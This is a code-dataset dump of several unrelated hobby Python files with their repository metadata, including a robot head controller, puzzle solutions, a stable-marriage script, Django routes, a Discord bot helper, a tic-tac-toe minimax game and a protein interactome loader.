while True:\n t2 = Thread(target=move_jaw)\n t3 = Thread(target=say)\n with mic as source:\n try:\n audio=r.listen(source)\n words= r.recognize_google(audio,language='en')\n t2 = Thread(target=move_jaw)\n t3=Thread(target=say)\n print (words)\n x=angle_hor\n if words == \"how are you\":\n n=10\n spoken =\"i am fine, well at least my head is fine, thank you\"\n t2.start()\n t3.start()\n elif words==\"meet the doctor\":\n n=9\n spoken='nice to meet you doctor, Please give them full marks'\n t2.start()\n t3.start()\n elif words==\"what's your name\":\n n=5\n spoken='my name is robot and you ?'\n t2.start()\n t3.start()\n elif words==\"turn left\":\n n=2\n spoken='at your service'\n t2.start()\n t3.start()\n sleep(1)\n neckhor.angle=150\n angle_hor=150\n sleep(1)\n elif words==\"turn back\":\n n=2\n spoken='at your service'\n t2.start()\n t3.start()\n sleep(1)\n neckhor.angle=x\n angle_hor=x\n elif words==\"can you help me\":\n n=3\n spoken='I am at your service'\n t2.start()\n t3.start()\n elif words==\"thank you\":\n n=3\n spoken='you are welcome'\n t2.start()\n t3.start()\n sleep(2)\n break\n elif (words.split()[0])==\"my\":\n z=words.split()\n n=3\n spoken=\"hello\"+z[-1]\n t2.start()\n t3.start()\n sleep(2)\n else:\n print(words)\n except:\n sr.UnknownValueError()\ndef say():\n global spoken\n engine.say(spoken)\n engine.runAndWait()\n\ndef turn_neck():\n global angle_hor\n global angle_ver\n global normal_angle_hor\n global normal_angle_ver\n h=normal_angle_hor #normal hor. angle (angle at which robot turned front in horizontal)\n v=normal_angle_ver #normal vertical angle (angle at which robot turned middle in vertical)\n if (angle_ver >=normal_angle_ver): #up\n if (angle_hor >=normal_angle_hor): #left\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h+1\n if (v!=angle_ver):\n v=v+1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to left up direction\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): # if right up directon\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h-1\n if(v!=angle_ver):\n v=v+1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to righrt up direction\n sleep(1)\n break\n elif (angle_ver <=normal_angle_ver): #if down\n if (angle_hor >=normal_angle_hor): #if left \n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h+1\n if(v!=angle_ver):\n v=v-1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to left down direction\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): #if right down direction\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h-1\n if(v!=angle_ver):\n v=v-1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to right down direction\n sleep(1)\n break\n \ndef turn_neck_back():\n global normal_angle_hor\n global normal_angle_ver\n global angle_hor\n global angle_ver\n h=angle_hor #set the horizontal variable with with the current hor. angle from (turn_neck) function (start angle)\n v=angle_ver #set the vertical variable with with the current ver. angle from (turn_neck) function (start angle)\n if (angle_ver >=normal_angle_ver): #if neck is in up position currently from the (turn_neck) function\n if (angle_hor >=normal_angle_hor): #if neck is in left position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.02)\n if (h!=normal_angle_hor):\n h=h-1\n if (v!=normal_angle_ver):\n v=v-1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. angles till they reach to normal (front middle) position\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): #if neck is in righr up position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.02)\n if (h!=normal_angle_hor):\n h=h+1\n if(v!=normal_angle_ver):\n v=v-1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. angles till they reach to normal (front middle) position\n sleep(1)\n break\n elif (angle_ver <=normal_angle_ver): #if neck is in down position currently from the (turn_neck) function \n if (angle_hor >=normal_angle_hor): #if neck is in left position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.01)\n if (h!=normal_angle_hor):\n h=h-1\n if(v!=normal_angle_ver):\n v=v+1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. angles till they reach to normal (front middle) position\n # sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): #if neck is in right down position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.01)\n if (h!=normal_angle_hor):\n h=h+1\n if(v!=normal_angle_ver):\n v=v+1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. angles till they reach to normal (front middle) position\n# sleep(1)\n break\ndef move_jaw():\n global n\n for i in range (n):\n jaw.angle = 60\n sleep(0.2)\n jaw.angle = 0\n sleep(0.2)\n#............................................................................................................\n#function that takes the front,right,left,down capture arguments and sets the required vertical angle\ndef callback(front,right,left,down):\n global count_start\n global angle_ver\n global angle_hor\n if (angle_ver!=25 and angle_ver!=50): #if the down sensor detected the signal first (then ver. angle is already given)\n diff=perf_counter_ns()-count_start #calculates the diffrence in time between the up and down sensor's signals\n \n if ((front==1 or right==1 or left==1 )and down==0): #up \n while (GPIO.input(channel4)==0 and (diff<555555)): #wait for the down sensor signal or diffrence in time if exeaded the 1111111\n diff=perf_counter_ns()-count_start #keep on capturing the diffrence in time between the up and down sensor's signals \n if (diff>555555 or diff>300000): #if while loop was exsites bec 555555 is exceeded or down signal is detected after 111111\n print (\"count=\" ,diff)\n print (\"Sound Detected up!\")\n angle_ver=120 \n elif (diff<300000 and diff>33333): #if while loop was exsites bec down signal is detected between 111111 and 55555 diff. in time\n print (\"count=\" ,diff)\n print (\"Sound Detected middle!\")\n angle_ver=normal_angle_ver \n else: #if while loop was exsites bec down signal is detected between in less than 55555 diff. in time\n print (\"count=\" ,diff)\n print (\"Sound Detected down 45!\")\n angle_ver=40 \n elif ((front==1 or right==1 or left==1 ) and down==1): #if both up and down sensors where detected at the same time\n print (\"count=\" ,diff)\n print (\"Sound Detected down 45!11\")\n angle_ver=40\n turn_neck() #at this step both horizontal and vertical angles where given and ready to be used in (turn_neck) function\n print (angle_hor , angle_ver)\n \n\n\ndef hor_detect(right ,left ,front): #this function takes (right ,left ,front) captured arguments and sets the required horizontal angle\n global angle_hor\n ff=1 #flage that detectes if the counter finished before the front sensor's signal is detected \n if (right==1 and left==0 and front==0 ): #if the right sensor detected the sound first\n print (\"right\" )\n angle_hor=50\n elif (right==0 and left==1 and front==0 ): #if the left sensor detected the sound first\n print (\"left\")\n angle_hor=150\n elif (right==0 and left==0 and front==1 ): #if the front sensor detected the sound first\n print (\"front1\")\n angle_hor=normal_angle_hor\n elif (right==1 and left==1 and front==0 ): #if the right & left sensors detected the sound at the same time\n print (\"front2\")\n angle_hor=normal_angle_hor\n elif (right==1 and left==1 and front==1 ): #if the right & left & front sensors detected the sound at the same time\n print (\"front3\")\n angle_hor=normal_angle_hor\n elif (right==1 and left==0 and front==1 ): #if the right & front sensors detected the sound at the same time\n print (\"right 45\")\n angle_hor=80\n elif (right==0 and left==1 and front==1 ): #if the left & front sensors detected the sound at the same time\n print (\"left 45\")\n angle_hor=130\n elif (right==0 and left==0 and front==0 ): #if no signal is detected\n print (\"zero break\")\n callback(front,right,left,down) #call functinon that sets the ver. angle since the distance between ver. sensors > hor.sensors\n \n#.........................................................................................................\n\nwhile True:\n \n neckver.angle = normal_angle_ver #set the initial middle vertical angle\n neckhor.angle=normal_angle_hor #set the initial front horizontal angle \n sleep(2)\n print(\"start\")\n angle_ver=normal_angle_ver\n #capture the right & left & front & down sensor states at the bigening of each cycle\n right=GPIO.input(channel1) \n left=GPIO.input(channel2)\n front=GPIO.input(channel3)\n down=GPIO.input(channel4)\n while (right ==0 and left==0 and front==0 and down==0): #(polling) wait for a signal from right/left/front/down sensors (wait for any sound )\n right=GPIO.input(channel1)\n left=GPIO.input(channel2)\n front=GPIO.input(channel3)\n down=GPIO.input(channel4)\n if (down==1): # if the down sensor detected the signal first (sound source is down )\n count_start=perf_counter_ns() #start counting time by taking a capture of time to be used later in gettin time diffrence (diff)\n while (right==0 and left==0 and front==0 ): # now wait for any signal from the up horizontal sensors\n right=GPIO.input(channel1)\n left=GPIO.input(channel2)#llllllllllllllllllll if only down detected\n front=GPIO.input(channel3)\n down=GPIO.input(channel4)\n \n print (\"Sound Detected down !\" )\n angle_ver=25\n count_start=perf_counter_ns() #start counting time by taking a capture of time to be used later in gettin time diffrence (diff) \n hor_detect(right ,left ,front) #call function that sets the horizontal angle\n order()\n sleep(0.3)\n turn_neck_back() #call the function that turn back the robot's head to normal (front middle) position\n# sleep(0.5) \n print (\"..............\") \nt1 = Thread(target=order)\nt2 = Thread(target=move_jaw)\nt3 = Thread(target=say)","repo_name":"aly1khaled1911/InMoov-Head","sub_path":"head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":14899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36794423895","text":"#List of words for use in Hangman game.\nwords = [\"aardvark\", \n \"baboon\", \n \"camel\", \n \"distracted\", \n \"element\", \n \"fiction\",\n \"gamble\",\n \"hesitate\",\n \"island\",\n \"joker\",\n \"laughing\"\n \"meditate\",\n \"neuron\",\n \"opulent\",\n \"programming\",\n \"quilt\",\n \"ridiculous\",\n \"simple\",\n \"traversal\",\n \"ubiquitous\",\n \"vulnerable\",\n \"welcome\",\n \"xray\",\n \"zebra\"\n]","repo_name":"Tr-Heath/PythonTutorials","sub_path":"Day7/wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12868990921","text":"#!/usr/bin/env python3\n\nwith open(\"day10_input\") as fh:\n nav = [line.strip() for line in fh.readlines()]\n\ndelimiter = {'(': ')', '[': ']', '{': '}', '<': '>'}\nopening = delimiter.keys()\npoints = {')': 3, ']': 57, '}': 1197, '>': 25137}\napoints= {')': 1, ']': 2, '}': 3, '>': 4}\nscore = 0\nascores = []\n\nfor n in nav:\n stack = []\n for c in n:\n if c in opening: # opening character\n stack.append(delimiter[c]) # add the matching closing character to the stack\n elif c == stack[-1]: # closing character matches the one on the stack\n stack.pop()\n else: # closing character does not match the one on the stack\n score += points[c]\n break # done with this line\n else:\n ascore = 0\n while stack: # incomplete line\n ascore = 5 * ascore + apoints[stack.pop()]\n if ascore > 0: # don't add a score if the line is complete and correct\n ascores.append(ascore)\n\nprint(f\"Part 1: Syntax error score: {score}\")\nprint(f\"Part 2: autocomplete score: {sorted(ascores)[len(ascores)//2]}\")\n","repo_name":"SnoozeySleepy/AdventofCode2021","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17959156936","text":"#You are given each man’s and woman’s preference lists. Given these lists find a stable matching, meaning #that\r\n#there do not exist two man-woman-pairs (m 1 , w 1 ), (m 2 , w 2 ) such that w 2 is higher ranked on m 1 ’s #preference list\r\n#than w 1 and simultaneously m 1 is higher ranked on w 2 ’s preference list than m 2 (thus that both m 1 and #w 2 would\r\n#prefer to change partner).\r\n\r\n#\r\n\r\n\r\nfrom operator import index\r\n\r\n\r\ndef GS (listfromtest):\r\n W = [] #list of women\r\n inputlist = [int(x) for x in listfromtest.split()]\r\n peopleamount = inputlist.pop(0) # how many males/females we have - also preferences amount\r\n print ('asdfasdf')\r\n M = [inputlist[x:x+peopleamount + 1] for x in range (0, len(inputlist), peopleamount + 1) ] # split input into sublists and gradually move sublists into W\r\n \r\n for i in range (1,peopleamount +1):\r\n for val in M: \r\n if val[0] == i:\r\n W.append(M.pop(M.index(val)))\r\n W[-1].pop(0)\r\n break\r\n for male in M:\r\n male.pop(0)\r\n \r\n #now men and women have pref lists in order in M, W\r\n\r\n for Woman in W: #invert list\r\n inverselist = []\r\n for index in range(1,peopleamount+1):\r\n for i in range (0, peopleamount):\r\n if index == Woman[i]:\r\n inverselist.append(i)\r\n W[W.index(Woman)] = inverselist\r\n \r\n\r\n unmarried = M\r\n married = [-1 for i in range(peopleamount)] #married is a list of women currently married to the index\r\n while -1 in married: #while some man has no woman\r\n for male in unmarried: #for each male in unmarried \r\n indexofman = unmarried.index(male) #index \r\n if married[indexofman] == -1: #if he is not married, we want to propose\r\n perfectgirl = male[0]\r\n if perfectgirl in married:\r\n Whatshethinksofproposer = W[perfectgirl][indexofman]\r\n Whatshethinksofhusband = W[perfectgirl][married.index(perfectgirl)]\r\n if perfectgirl not in married: #if his pref is not married\r\n married[indexofman] = male.pop(0) #his pref is added to his married spot and removed from his preflist as no point in trying again\r\n elif Whatshethinksofproposer>Whatshethinksofhusband: #\r\n married[married.index(perfectgirl)] = -1\r\n married[unmarried.index(male)] = perfectgirl\r\n else:\r\n male.pop(0)\r\n \r\n print (*married, sep='\\n')\r\ncontents = []\r\nwhile True:\r\n try:\r\n line = input()\r\n except EOFError:\r\n break\r\n contents.append(line)\r\nlistToStr = ' '.join([str(elem) for elem in contents])\r\n#GS('2 1 1 2 1 2 1 2 2 1 2 1 2 ')\r\n#GS('4 4 2 1 4 3 1 3 2 4 1 1 1 4 3 2 2 2 4 3 1 3 1 2 4 3 3 4 3 1 2 4 3 2 4 1 2 1 3 2 4')\r\n#GS('10 5 9 4 3 1 5 8 2 6 10 7 1 3 1 9 2 8 5 10 6 7 4 7 8 2 7 4 9 10 1 5 3 6 9 10 1 5 7 8 3 9 4 6 2 4 5 2 8 9 4 6 3 7 1 10 7 3 7 2 6 8 4 5 1 9 10 10 10 7 6 4 2 8 5 9 3 1 3 7 8 2 10 3 5 9 6 1 4 6 10 9 7 1 3 2 4 8 6 5 1 2 9 5 1 10 8 4 6 7 3 8 2 9 4 8 7 6 10 1 3 5 6 1 10 9 5 4 3 2 8 7 6 4 6 2 8 7 10 3 5 9 1 4 2 10 1 7 5 6 8 3 2 4 9 2 7 1 8 3 2 9 4 6 10 5 3 7 9 2 10 5 8 4 6 1 3 9 5 3 7 2 10 1 6 4 9 8 10 4 9 8 7 3 5 6 1 2 10 5 5 8 7 3 9 2 1 10 4 6 8 9 8 5 3 6 7 2 1 4 10')\r\nGS(listToStr)\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jonte1346/DataStructures","sub_path":"stablemarriage.py","file_name":"stablemarriage.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7877026110","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @FileName :981. Time Based Key-Value Store.py\n# @Time :11/5/21 11:13 AM\n# @Author :Eason Tang\nclass TimeMap:\n\n def __init__(self):\n self.dict = {}\n\n def set(self, key: str, value: str, timestamp: int) -> None:\n if key not in self.dict:\n self.dict[key] = []\n if key in self.dict:\n self.dict[key].append((timestamp, value))\n\n def get(self, key: str, timestamp: int) -> str:\n if key in self.dict:\n nums = self.dict[key]\n target = timestamp\n idx = self.binarysearch(nums, target)\n return self.dict[key][idx][1] if idx >= 0 else \"\"\n return \"\"\n\n def binarysearch(self, nums, target):\n lo = 0\n hi = len(nums) - 1\n while lo <= hi:\n mid = (lo + hi) // 2\n if nums[mid][0] > target:\n hi = mid - 1\n elif nums[mid][0] < target:\n lo = mid + 1\n else:\n return mid\n return hi\n\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)\nobj = TimeMap()\nobj.set(\"love\", \"high\", 10)\nobj.set(\"love\", \"low\", 20)\nparam_3 = obj.get(\"love\", 5)\nparam_3 = obj.get(\"love\", 15)\nprint(param_3)\n","repo_name":"tangyisheng2/leetcode-note","sub_path":"code/981. Time Based Key-Value Store.py","file_name":"981. Time Based Key-Value Store.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18918962447","text":"from django.urls import path\n\nfrom soteria.orgs.views.location import LocationListCreateAPI\nfrom soteria.orgs.views.location_detail import LocationDetailGetUpdateAPI\nfrom soteria.orgs.views.organization import OrganizationCreateAPI\nfrom soteria.orgs.views.organization_detail import OrganizationDetailGetUpdateAPI\nfrom soteria.orgs.views.organization_invite import OrganizationInviteAcceptAPI\nfrom soteria.orgs.views.organization_member import OrganizationMemberListCreateAPI\nfrom soteria.orgs.views.orgnization_member_detail import OrganizationMemberGetUpdateDeleteAPI\nfrom soteria.orgs.views.user_organization import UserOrganizationListAPI\n\nurlpatterns = [\n path(\"api/v1/organizations/\", OrganizationCreateAPI.as_view(), name=\"create-organizations\"),\n path(\n \"api/v1/me/organizations/\",\n UserOrganizationListAPI.as_view(),\n name=\"user-organizations-list\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/\",\n OrganizationDetailGetUpdateAPI.as_view(),\n name=\"organization-details\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/locations/\",\n LocationListCreateAPI.as_view(),\n name=\"organization-locations\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/locations/<uuid:location_id>/\",\n LocationDetailGetUpdateAPI.as_view(),\n name=\"organization-location-details\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/members/\",\n OrganizationMemberListCreateAPI.as_view(),\n name=\"organization-members\",\n ),\n path(\n \"api/v1/organizations/members/accept-invite/\",\n OrganizationInviteAcceptAPI.as_view(),\n name=\"organization-member-accept-invite\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/members/<uuid:member_id>/\",\n OrganizationMemberGetUpdateDeleteAPI.as_view(),\n name=\"organization-member-details\",\n ),\n]\n","repo_name":"rajeshyadav456/allproject","sub_path":"soteria-backend-main/src/soteria/orgs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2120477353","text":"'''\nJoshua V. Esguerra\n170 - WX3L\nMinMax Algorithm\n\n\nReference:\nhttps://github.com/AlejoG10/python-tictactoe-ai-yt\n'''\n\nimport copy\nimport random\nimport pygame\nimport sys\nimport numpy as np\nfrom constants import *\n\n# initial pygame window\npygame.init()\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Tic Tac Toe\")\nscreen.fill(BG_COLOR)\n\nclass Board:\n def __init__(self):\n self.squares = np.zeros((ROWS,COLS)) # initialize values to 0\n self.empty_sqrs = self.squares # list of squares\n self.marked_sqrs = 0\n \n def mark_sqr(self,row,col,player):\n self.squares[row][col] = player\n self.marked_sqrs += 1 # to know when board is full\n\n def empty_sqr(self,row,col):\n return self.squares[row][col] == 0\n\n def isfull(self):\n return self.marked_sqrs == 9\n\n def isempty(self):\n return self.marked_sqrs == 0\n\n def get_empty_sqrs(self):\n empty_sqrs = []\n for row in range(ROWS):\n for col in range(COLS):\n if self.empty_sqr(row, col):\n empty_sqrs.append( (row, col) )\n \n return empty_sqrs\n\n # return 0 if no one won yet\n # return 1 if p1 wins\n # return 2 if p2 wins\n def final_state(self, show=False):\n # vertical wins\n for col in range(COLS):\n if self.squares[0][col] == self.squares[1][col] == self.squares[2][col] != 0:\n if show:\n color = CIRC_COLOR if self.squares[0][col] == 2 else CROSS_COLOR\n iPos = (col * SQSIZE + SQSIZE // 2, 20)\n fPos = (col * SQSIZE + SQSIZE // 2, HEIGHT - 20)\n pygame.draw.line(screen, color, iPos, fPos, LINE_WIDTH)\n return self.squares[0][col]\n\n # horizontal wins\n for row in range(ROWS):\n if self.squares[row][0] == self.squares[row][1] == self.squares[row][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[row][0] == 2 else CROSS_COLOR\n iPos = (20, row * SQSIZE + SQSIZE // 2)\n fPos = (WIDTH - 20, row * SQSIZE + SQSIZE // 2)\n pygame.draw.line(screen, color, iPos, fPos, LINE_WIDTH)\n return self.squares[row][0]\n\n # desc diagonal\n if self.squares[0][0] == self.squares[1][1] == self.squares[2][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[1][1] == 2 else CROSS_COLOR\n iPos = (20, 20)\n fPos = (WIDTH - 20, HEIGHT - 20)\n pygame.draw.line(screen, color, iPos, fPos, CROSS_WIDTH)\n return self.squares[1][1]\n\n # asc diagonal\n if self.squares[2][0] == self.squares[1][1] == self.squares[0][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[1][1] == 2 else CROSS_COLOR\n iPos = (20, HEIGHT - 20)\n fPos = (WIDTH - 20, 20)\n pygame.draw.line(screen, color, iPos, fPos, CROSS_WIDTH)\n return self.squares[1][1]\n\n # no win yet\n return 0\n\nclass AI:\n def __init__(self, player=2,level=1): # default player is player 2\n self.level = level\n self.player = player\n\n def random_move(self,board):\n empty_sqrs = board.get_empty_sqrs() # get all the list of empty squares in the board\n index = random.randrange(0,len(empty_sqrs))\n\n return empty_sqrs[index] # row, col\n\n # ai is going to minimize if maximize is false\n # ai is player 2\n def minimax(self,board,maximize):\n \n # check terminal case\n # checks current state of the board if match to a final_state\n case = board.final_state()\n\n # p1 wins\n # if maximizing return 1\n if case == 1:\n return 1, None # eval, move\n \n # p2 wins\n # since ai is minimizing ai must return -1\n if case == 2:\n return -1, None\n\n # draw\n elif board.isfull():\n return 0, None\n\n # starts here if ai is player number 1\n if maximize:\n max_eval = -100\n best_move = None\n empty_sqrs = board.get_empty_sqrs()\n\n # loop each empty square\n for (row, col) in empty_sqrs:\n temp_board = copy.deepcopy(board) # deep copy board so that main board will not be modified\n #if self.player == 2:\n temp_board.mark_sqr(row,col,1) # make move; 1 is p1\n # else:\n # temp_board.mark_sqr(row,col,2)\n eval = self.minimax(temp_board, False)[0] # recursion part; True is the player move; 0 is the case 1,-1,0\n if eval > max_eval:\n max_eval = eval\n best_move = (row, col)\n\n return max_eval, best_move\n\n # starts here if ai is player number 2\n elif not maximize:\n min_eval = 1000\n best_move = None\n empty_sqrs = board.get_empty_sqrs()\n\n # loop each empty square\n for (row, col) in empty_sqrs:\n temp_board = copy.deepcopy(board) # deep copy board so that main board will not be modified\n # if self.player == 2:\n temp_board.mark_sqr(row,col,self.player) # make move; self.player is ai \n # else:\n # temp_board.mark_sqr(row,col,1) \n # switches to the max\n eval = self.minimax(temp_board, True)[0] # recursion part; True is the player move; 0 is the case 1,-1,0\n if eval < min_eval:\n min_eval = eval\n best_move = (row, col)\n\n return min_eval, best_move\n\n def eval(self, main_board):\n if self.level == 0:\n # random choice\n eval = 'random'\n move = self.random_move(main_board) # row col\n else:\n # minmax algo\n #if self.player == 2:\n eval, move = self.minimax(main_board,False)\n # else:\n # eval, move = self.minimax(main_board,True)\n\n print(f'AI has chosen to mark the square in pos {move} with an eval of: {eval}')\n return move\n\nclass Game:\n def __init__(self,player,ai_player):\n self.board = Board()\n self.ai = AI()\n self.player = player\n self.gamemode = 'ai' # pvp or ai\n self.running = True # If game over, set to False\n self.show_lines()\n self.ai_player = ai_player\n\n # create the lines of tic tac toe\n def show_lines(self):\n # to clear initial screen\n screen.fill(BG_COLOR)\n # vertical\n pygame.draw.line(screen,LINE_COLOR,(SQSIZE,0),(SQSIZE, HEIGHT), LINE_WIDTH)\n pygame.draw.line(screen,LINE_COLOR,(WIDTH - SQSIZE,0),(WIDTH -SQSIZE, HEIGHT), LINE_WIDTH)\n\n #horizonal\n pygame.draw.line(screen,LINE_COLOR,(0,SQSIZE),(WIDTH, SQSIZE), LINE_WIDTH)\n pygame.draw.line(screen,LINE_COLOR,(0,HEIGHT - SQSIZE),(WIDTH,HEIGHT -SQSIZE), LINE_WIDTH)\n\n def draw_fig(self,row,col):\n if self.ai_player == 1:\n if self.player == 2:\n # draw cross\n pos1 = (col * SQSIZE + OFFSET,row * SQSIZE + OFFSET)\n pos2 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n\n pos3 = (col * SQSIZE + OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n pos4 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + OFFSET)\n\n pygame.draw.line(screen,CROSS_COLOR,pos1,pos2, CROSS_WIDTH)\n pygame.draw.line(screen,CROSS_COLOR,pos3,pos4, CROSS_WIDTH)\n pass\n elif self.player == 1:\n # draw circle\n center = (col * SQSIZE + SQSIZE//2,row *SQSIZE + SQSIZE//2)\n pygame.draw.circle(screen, CIRC_COLOR, center, RADIUS, CIRC_WIDTH)\n else:\n if self.player == 1:\n # draw cross\n pos1 = (col * SQSIZE + OFFSET,row * SQSIZE + OFFSET)\n pos2 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n\n pos3 = (col * SQSIZE + OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n pos4 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + OFFSET)\n\n pygame.draw.line(screen,CROSS_COLOR,pos1,pos2, CROSS_WIDTH)\n pygame.draw.line(screen,CROSS_COLOR,pos3,pos4, CROSS_WIDTH)\n pass\n elif self.player == 2:\n # draw circle\n center = (col * SQSIZE + SQSIZE//2,row *SQSIZE + SQSIZE//2)\n pygame.draw.circle(screen, CIRC_COLOR, center, RADIUS, CIRC_WIDTH)\n\n # change players\n def next_turn(self):\n self.player = self.player % 2 + 1\n\n # if ai will make turn first\n # make player 2 then 1\n # def next_turn_user(self):\n # self.player = 2\n \n # def next_turn_ai(self):\n # self.player = 1\n \n # change game mode\n def change_gamemode(self):\n if self.gamemode == 'pvp':\n self.gamemode = 'ai'\n else:\n self.gamemode = 'pvp'\n\n def reset(self):\n self.__init__()\n\n def isdone(self):\n return self.board.final_state(show=True) != 0 or self.board.isfull()\n\n def move(self, row, col):\n self.board.mark_sqr(row, col, self.player)\n self.draw_fig(row, col)\n self.next_turn()\n\n\n\ndef main():\n # get input from user\n player_number = input(\"Player 1 or Player 2? Choose [1] or [2]\\n\")\n pnum = int(player_number)\n if pnum == 2:\n ai_num = 1\n else:\n ai_num = 0\n # game object\n game = Game(pnum,ai_num)\n #game = Game()\n board = game.board\n ai = game.ai\n\n run = 0\n first = 0\n\n\n while True:\n #if int(player_number) == 1:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.KEYDOWN:\n # G - gamemode\n if event.key == pygame.K_g:\n game.change_gamemode()\n \n # choose ai level\n # Press - 0\n if event.key == pygame.K_0:\n ai.level = 0\n # Press - 1\n if event.key == pygame.K_1:\n ai.level = 1\n\n if event.key == pygame.K_r:\n game.reset()\n board = game.board\n ai = game.ai\n\n # check mouse event\n if event.type == pygame.MOUSEBUTTONDOWN:\n\n # gets the equivalent position in the table self.squares\n pos = event.pos\n row = pos[1]//SQSIZE\n col = pos[0]//SQSIZE\n\n if board.empty_sqr(row,col) and game.running:\n # make move\n # board.mark_sqr(row,col,game.player)\n # game.draw_fig(row,col)\n # game.next_turn()\n game.move(row, col)\n\n print(game.board)\n \n # check if game is done to prevent errors\n if game.isdone():\n game.running = False\n\n if game.gamemode == 'ai' and game.player == ai.player and game.running:\n # update screen\n pygame.display.update() \n\n # ai functions\n row, col = ai.eval(board)\n\n # make move\n # board.mark_sqr(row,col,ai.player)\n # game.draw_fig(row,col)\n # game.next_turn()\n game.move(row, col)\n \n\n # check if game is done to prevent errors\n if game.isdone():\n game.running = False\n\n pygame.display.update() \n\nmain()","repo_name":"jvesguerra/Tic-Tac-Toe","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":11892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26909411011","text":"import json\nfrom pathlib import Path\nfrom discord.ext import commands\nimport requests\n\n\ndef return_default_config():\n with open(Path(__file__).parent.parent / 'utils/files/config.json') as f:\n return json.loads(f.read())\n\n\ndef return_cmd_config():\n with open(Path(__file__).parent.parent / 'utils/files/cmds.json') as f:\n return json.load(f)\n\n\ncmdCfg = return_cmd_config()\nconfig = return_default_config()\n\n\ndef is_enabled(group):\n if cmdCfg[group][\"enabled\"]:\n return True\n else:\n return False\n\n\ndef get_meme(memes):\n # get memmes from tenor api\n\n url = f'https://api.tenor.com/v1/search?q={memes}&key={config[\"tenor\"][\"key\"]}&limit={config[\"tenor\"][\"limit\"]}'\n r = requests.get(url)\n if r.status_code == 200:\n data = json.loads(r.content)\n return data\n","repo_name":"parushb/bot-light","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24425330451","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n# iref interactome (downloaded from the omics integrator github page)\r\niref = pd.read_csv(\"raw_data/iref_mitab_miscore_2013_08_12_interactome.txt\", delimiter=\"\\t\",\r\n names=[\"Interactor 1\", \"Interactor 2\", \"iref_confidence\"], header=None, low_memory=False)\r\n\r\n# string interactome (downloaded only human interactome and names mapped, low confidence filtered out)\r\nstring = pd.read_csv(\"raw_data/9606.protein.links.v11.5.txt\", delimiter=\" \", low_memory=False)\r\nstring_info = pd.read_csv(\"raw_data/9606.protein.info.v11.5.txt\", delimiter=\"\\t\", low_memory=False)\r\nstring_mapper = dict(zip(list(string_info[\"#string_protein_id\"]), list(string_info[\"preferred_name\"])))\r\nstring[string.columns[0]] = 